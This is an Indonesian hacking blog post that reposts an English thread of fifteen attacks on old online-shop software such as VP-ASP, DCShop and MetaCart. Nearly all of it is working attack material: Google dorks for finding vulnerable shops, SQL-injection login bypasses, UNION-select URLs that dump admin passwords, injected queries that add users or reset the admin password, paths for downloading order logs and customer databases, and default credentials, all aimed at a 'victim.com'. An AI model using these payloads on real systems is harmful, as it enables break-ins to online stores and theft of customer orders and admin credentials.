• Beranda
  • Autosultan
  • Bitcoin
  • Dollar
  • Linux
  • LOKER
  • Printer
  • Sofware
  • sosial
  • TISniper
  • Virus
  • Windows

T.I Sniper

#Expert Advisor for MetaTrader 4 #Expert Advisor for MetaTrader 5 #youtube #google #free dollar business every day #Lowongan #Pekerjaan #Loker #forex #trading Autopilot #mining crypto #Update #Tutorial #Komputer Perbaikan, #Email #Facebook , #whatsapp ,#instagram #telegram ,#Internet ,#Motivasi , #Crypto , #AirDrop, #Bitcoin, #Ethereum, #Binance coin, #Cardano, #Degocoin, #Litecoin #Indodax, #Coinbase, #Nexo Dan Mata Uang Digital Lain , #Website, Perbaikan #Server #Domain , #Hosting, #Whm

    • Beranda
    • Contact Forum
    • Coffee JKs88
    • Tentang Kami
    • Parse Code Html
    • Text Terbalik
    • Privacy Policy

    Ikuti Kami!

    Follow Akun Instagram Kami Dapatkan Notifikasi Terbaru!
    Ikuti Kami di Facebok! Untuk mendapatkan notifikasi terbaru.

    Postingan Populer

    Backlink dengan Google Dork Seo

    Dork Seo
    Januari 01, 2016
    0

    Cara Dapat Backlink dengan Google Dork

    Dork Seo
    Februari 13, 2016
    0

    Cara Dapat Backlink Edu Gratis

    Seo
    Februari 13, 2016
    0

    Download File ISO Windows 11 Dan Bootable USB Rufus

    Sofware Windows
    Desember 02, 2021
    0

    FORUM 

    FORUM
    Desember 31, 2021
    0
    Author
    chmood
    Tautan disalin ke papan klip!
    Share Posts "Hack - Shopadmins - Exploits - Dorks"
  • Salin link
  • Simpan Ke Daftar Bacaan
  • Bagikan ke Facebook
  • Bagikan ke Twitter
  • Bagikan ke Pinterest
  • Bagikan ke Telegram
  • Bagikan ke Whatsapp
  • Bagikan ke Tumblr
  • Bagikan ke Line
  • Bagikan ke Email
  • HomeDefaceDorkExploitationsVulnHack - Shopadmins - Exploits - Dorks
    Hack - Shopadmins - Exploits - Dorks

    Hack - Shopadmins - Exploits - Dorks

    Simpan Postingan
    Hack - Shopadmins - Exploits - Dorks



    1:
    google dork :--> inurl:"/cart.php?m="
    target looks lile :--> http://xxxxxxx.com/s...cart.php?m=view
    exploit: chage cart.php?m=view to /admin
    target whit exploit :--> http://xxxxxx.com/store/admin
    Usename : 'or"="
    Password : 'or"=

    2:
    google dork :--> allinurlroddetail.asp?prod=
    target looks like :--> xxxxx.org (big leters and numbers )
    exploit :--> chage the proddtail.asp?prod=SG369 whit fpdb/vsproducts.mdb
    target whit exploit :--> http://www.xxxxxx.org/fpdb/vsproducts.mdb


    3:
    google dork :--> allinurl: /cgi-local/shopper.cgi
    target looks like :--> http://www.xxxxxx.co....dd=action&key=
    exploit :--> ...&template=order.log
    target whit exploit :--> http://www.xxxxxxxx.....late=order.log


    4:
    google dork :--> allinurl: Lobby.asp
    target looks like :--> http://www.xxxxx.com/mall/lobby.asp
    exploit :--> change /mall/lobby.asp to /fpdb/shop.mdb
    target whit exploit :--> http://www.xxxxx.com/fpdb/shop.mdb


    5:
    google dork :--> allinurl:/vpasp/shopsearch.asp
    when u find a target put this in search box
    Keyword=&category=5); insert into tbluser (fldusername) values
    ('')--&SubCategory=&hide=&action.x=46&action.y=6
    Keyword=&category=5); update tbluser set fldpassword='' where
    fldusername=''--&SubCategory=All&action.x=33&action.y=6
    Keyword=&category=3); update tbluser set fldaccess='1' where
    fldusername=''--&SubCategory=All&action.x=33&action.y=6
    Jangan lupa untuk mengganti dan nya terserah kamu.
    Untuk mengganti password admin, masukkan keyword berikut :
    Keyword=&category=5); update tbluser set fldpassword='' where
    fldusername='admin'--&SubCategory=All&action.x=33&action.y=6


    login page: http://xxxxxxx/vpasp/shopadmin.asp


    6:
    google dork :--> allinurl:/vpasp/shopdisplayproducts.asp
    target looks like :--> http://xxxxxxx.com/v....asp?cat=xxxxxx
    exploit :--> http://xxxxxxx.com/vpasp/shopdisplay...20union%20sele ct%20fldauto,fldpassword%20from%20tbluser%20where% 20fldusername='admin'%20and%20fldpassword%20like%2 0'a%25'-
    if this is not working try this ends
    %20'a%25'--
    %20'b%25'--
    %20'c%25'--
    after finding user and pass go to login page:
    http://xxxx.com/vpasp/shopadmin.asp


    7:
    google dork :--> allinurl:/shopadmin.asp
    target looks like :--> http://www.xxxxxx.com/shopadmin.asp
    exploit:
    user : 'or'1
    pass : 'or'1

    8:
    google.com :--> allinurl:/store/index.cgi/page=
    target looks like :--> http://www.xxxxxx.co....short_blue.htm
    exploit :--> ../admin/files/order.log
    target whit exploit :--> http://www.xxxxxxx.c....iles/order.log

    9:
    google.com:--> allinurl:/metacart/
    target looks like :--> http://www.xxxxxx.com/metacart/about.asp
    exploit :--> /database/metacart.mdb
    target whit exploit :--> http://www.xxxxxx.com/metacart/database/metacart.mdb

    10:
    google.com:--> allinurl:/DCShop/
    target looks like :--> http://www.xxxxxx.com/xxxx/DCShop/xxxx
    exploit :--> /DCShop/orders/orders.txt or /DCShop/Orders/orders.txt
    target whit exploit :--> http://www.xxxx.com/xxxx/DCShop/orders/orders.txt or http://www.xxxx.com/xxxx/DCShop/Orders/orders.txt


    11:
    google.com:--> allinurl:/shop/category.asp/catid=
    target looks like :--> http://www.xxxxx.com/shop/category.asp/catid=xxxxxx
    exploit :--> /admin/dbsetup.asp
    target whit exploit :--> http://www.xxxxxx.com/admin/dbsetup.asp
    after geting that page look for dbname and path. (this is also good file sdatapdshoppro.mdb , access.mdb)
    target for dl the data base :--> http://www.xxxxxx.com/data/pdshoppro.mdb (dosent need to be like this)
    in db look for access to find pass and user of shop admins.


    12:
    google.com:--> allinurl:/commercesql/
    target looks like :--> http://www.xxxxx.com/commercesql/xxxxx
    exploit :--> cgi-bin/commercesql/index.cgi?page=
    target whit exploit admin config :--> http://www.xxxxxx.co..../admin_conf.pl
    target whit exploit admin manager :--> http://www.xxxxxx.co....in/manager.cgi
    target whit exploit order.log :--> http://www.xxxxx.com....iles/order.log

    13:
    google.com:--> allinurl:/eshop/
    target looks like :--> http://www.xxxxx.com/xxxxx/eshop
    exploit :-->/cg-bin/eshop/database/order.mdb
    target whit exploit :--> http://www.xxxxxx.co....base/order.mdb
    after dl the db look at access for user and password


    14:
    1/ search google: allinurl:"shopdisplayproducts.asp?id=
    --->http://victim.com/shopdisplayproducts.asp?id=5


    2/ find error by adding '
    --->http://victim.com/shopdisplayproducts.asp?id=5'


    --->error: Microsoft JET database engine error "80040e14"...../shop$db.asp, line467


    -If you don't see error then change id to cat


    --->http://victim.com/shopdisplayproducts.asp?cat=5'


    3/ if this shop has error then add this: %20union%20select%201%20from%20tbluser"having%201= 1--sp_password


    --->http://victim.com/shopdisplayproduct...on%20select%20 1%20from%20tbluser"having%201=1--sp_password


    --->error: 5' union select 1 from tbluser "having 1=1--sp_password.... The number of column in the two selected tables or queries of a union queries do not match......


    4/ add 2,3,4,5,6.......until you see a nice table


    add 2
    ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2%20from%20tbluser"having%201=1--sp_password
    then 3
    ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3%20from%20tbluser"having%201=1--sp_password
    then 4 ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3,4%20from%20tbluser"having%201=1--sp_password


    ...5,6,7,8,9.... untill you see a table. (exp:...47)


    ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,,43,44,45,46,47%20from%20tbluser" having%201=1--sp_password
    ---->see a table.




    5/ When you see a table, change 4 to fldusername and 22 to fldpassword you will have the admin username and password


    --->http://victim.com/shopdisplayproduct...on%20%20elect% 201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47%20from%20tbluser%22having%201=1--sp_password


    6/ Find link admin to login:
    try this first: http://victim.com/shopadmin.asp
    or: http://victim.com/shopadmin.asp




    Didn't work? then u have to find yourself:


    add: (for the above example) '%20union%20select%201,2,3,fieldvalue,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sp_password


    --->http://victim.com/shopdisplayproduct...n%20select%201 ,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sp_password




    you'll see something like: ( lot of them)


    shopaddmoretocart.asp
    shopcheckout.asp
    shopdisplaycategories.asp
    ..............


    then guess admin link by adding the above data untill you find admin links

    15:
    xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber.:. EXAMPLE .:.
    the most important thing here is xDatabase
    xDatabase: shopping140
    ok now the URL will be like this:
    ****://***.victim.com/shop/shopping140.mdb
    if you didn't download the Database..
    Try this while there is dblocation.
    xDblocation
    resx


    the url will be:
    ****://***.victim.com/shop/resx/shopping140.mdb
    If u see the error message you have to try this :
    ****://***.victim.com/shop/shopping500.mdb


    download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com


    inside you should be able to find *** information.
    and you should even be able to find the admin username and password for the website.


    the admin login page is usually located here
    ****://***.victim.com/shop/shopadmin.asp


    if you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all then try to find the admin login page and enter the default passwords which are


    Username: admin
    password: admin
    OR
    Username: vpasp
    password: vpasp

    Hope you enjoy this thread !!
    if you like it, Don't forget to say thanks T.I Sniper


    Deface Dork Exploitations Vuln
    Desember 16, 2015 • 0 komentar
    Disclaimer: gambar, artikel ataupun video yang ada di web ini terkadang berasal dari berbagai sumber media lain. Hak Cipta sepenuhnya dipegang oleh sumber tersebut. Jika ada masalah terkait hal ini, Anda dapat menghubungi kami di halaman ini.
    Isi dari komentar adalah tanggung jawab dari pengirim. T.I Sniper mempunyai hak untuk tidak memperlihatkan komentar yang tidak etis atau kasar. Jika ada komentar yang melanggar aturan ini, tolong dilaporkan.

    T.I Sniper

    Your description here

    • Follow
    • Autosultan
    • Wa Admin Bisnis
    Copyright ©2010 - 2022 🔥 T.I Sniper.
    • Beranda
    • Cari
    • Posting
    • Trending
    • Tersimpan